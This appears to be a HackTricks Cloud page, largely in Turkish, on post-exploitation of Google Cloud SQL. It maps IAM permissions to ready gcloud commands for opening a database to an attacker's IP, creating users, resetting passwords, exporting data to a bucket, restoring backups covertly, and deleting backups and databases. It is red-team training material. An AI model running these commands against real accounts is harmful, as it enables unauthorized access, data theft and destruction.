GCP - Cloud SQL Post Exploitation

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Cloud SQL

Cloud SQL hakkında daha fazla bilgi için kontrol edin:

GCP - Cloud SQL Enum

`cloudsql.instances.update`, ( `cloudsql.instances.get`)

Veritabanlarına bağlanmak için sadece veritabanı portuna erişim ve kullanıcı adı ile şifreyi bilmeniz yeterlidir, herhangi bir IAM gereksinimi yoktur. Bu nedenle, veritabanının bir genel IP adresine sahip olduğunu varsayarsak, erişim sağlamak için kolay bir yol, izin verilen ağları güncelleyip kendi IP adresinizi erişime açmaktır.

# Use --assign-ip to make the database get a public IPv4
gcloud sql instances patch $INSTANCE_NAME \
--authorized-networks "$(curl ifconfig.me)" \
--assign-ip \
--quiet

mysql -h <ip_db> # If mysql

# With cloudsql.instances.get you can use gcloud directly
gcloud sql connect mysql --user=root --quiet

Aynı zamanda veritabanının yedeklerini bozmak için --no-backup kullanmak da mümkündür.

Bu gereksinimler olduğundan, cloudsql.instances.connect ve cloudsql.instances.login izinlerinin ne için olduğunu tam olarak bilmiyorum. Eğer biliyorsanız bir PR gönderin!

`cloudsql.users.list`

Veritabanının tüm kullanıcılarının listesini al:

gcloud sql users list --instance <intance-name>

`cloudsql.users.create`

Bu izin, veritabanında yeni bir kullanıcı oluşturmayı sağlar:

gcloud sql users create <username> --instance <instance-name> --password <password>

`cloudsql.users.update`

Bu izin, veritabanı içindeki kullanıcıyı güncellemeye olanak tanır. Örneğin, şifresini değiştirebilirsiniz:

gcloud sql users set-password <username> --instance <instance-name> --password <password>

`cloudsql.instances.restoreBackup`, `cloudsql.backupRuns.get`

Yedekler eski hassas bilgileri içerebilir, bu yüzden bunları kontrol etmek ilginçtir. Bir veritabanında bir yedeği geri yükleyin:

gcloud sql backups restore <backup-id> --restore-instance <instance-id>

Daha gizli bir şekilde yapmak için, mevcut çalışan veritabanlarında değil, verileri orada kurtarmak için yeni bir SQL örneği oluşturulması önerilir.

`cloudsql.backupRuns.delete`

Bu izin, yedeklemeleri silmeye olanak tanır:

gcloud sql backups delete <backup-id> --instance <instance-id>

`cloudsql.instances.export`, `storage.objects.create`

Bir veritabanını Cloud Storage Bucket'a aktarın, böylece oradan erişebilirsiniz:

# Export sql format, it could also be csv and bak
gcloud sql export sql <instance-id> <gs://bucketName/fileName> --database <db>

`cloudsql.instances.import`, `storage.objects.get`

Bir veritabanını içe aktar (üzerine yaz) bir Cloud Storage Bucket'tan:

# Import format SQL, you could also import formats bak and csv
gcloud sql import sql <instance-id> <gs://bucketName/fileName>

`cloudsql.databases.delete`

Bir veritabanını db örneğinden sil:

gcloud sql databases delete <db-name> --instance <instance-id>

HackTricks'i Destekleyin

abonelik planlarını kontrol edin!
💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da 🐦 @hacktricks_live'i takip edin.**
Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.

PreviousGCP - Cloud Shell Post Exploitation NextGCP - Compute Post Exploitation

Last updated 3 days ago

Cloud SQL

cloudsql.instances.update, ( cloudsql.instances.get)

cloudsql.users.list

cloudsql.users.create

cloudsql.users.update

cloudsql.instances.restoreBackup, cloudsql.backupRuns.get

cloudsql.backupRuns.delete

cloudsql.instances.export, storage.objects.create

cloudsql.instances.import, storage.objects.get

cloudsql.databases.delete

Cloud SQL

cloudsql.instances.update, ( cloudsql.instances.get)

cloudsql.users.list

cloudsql.users.create

cloudsql.users.update

cloudsql.instances.restoreBackup, cloudsql.backupRuns.get

cloudsql.backupRuns.delete

cloudsql.instances.export, storage.objects.create

cloudsql.instances.import, storage.objects.get

cloudsql.databases.delete

`cloudsql.instances.update`, ( `cloudsql.instances.get`)

`cloudsql.users.list`

`cloudsql.users.create`

`cloudsql.users.update`

`cloudsql.instances.restoreBackup`, `cloudsql.backupRuns.get`

`cloudsql.backupRuns.delete`

`cloudsql.instances.export`, `storage.objects.create`

`cloudsql.instances.import`, `storage.objects.get`

`cloudsql.databases.delete`

`cloudsql.instances.update`, ( `cloudsql.instances.get`)

`cloudsql.users.list`

`cloudsql.users.create`

`cloudsql.users.update`

`cloudsql.instances.restoreBackup`, `cloudsql.backupRuns.get`

`cloudsql.backupRuns.delete`

`cloudsql.instances.export`, `storage.objects.create`

`cloudsql.instances.import`, `storage.objects.get`

`cloudsql.databases.delete`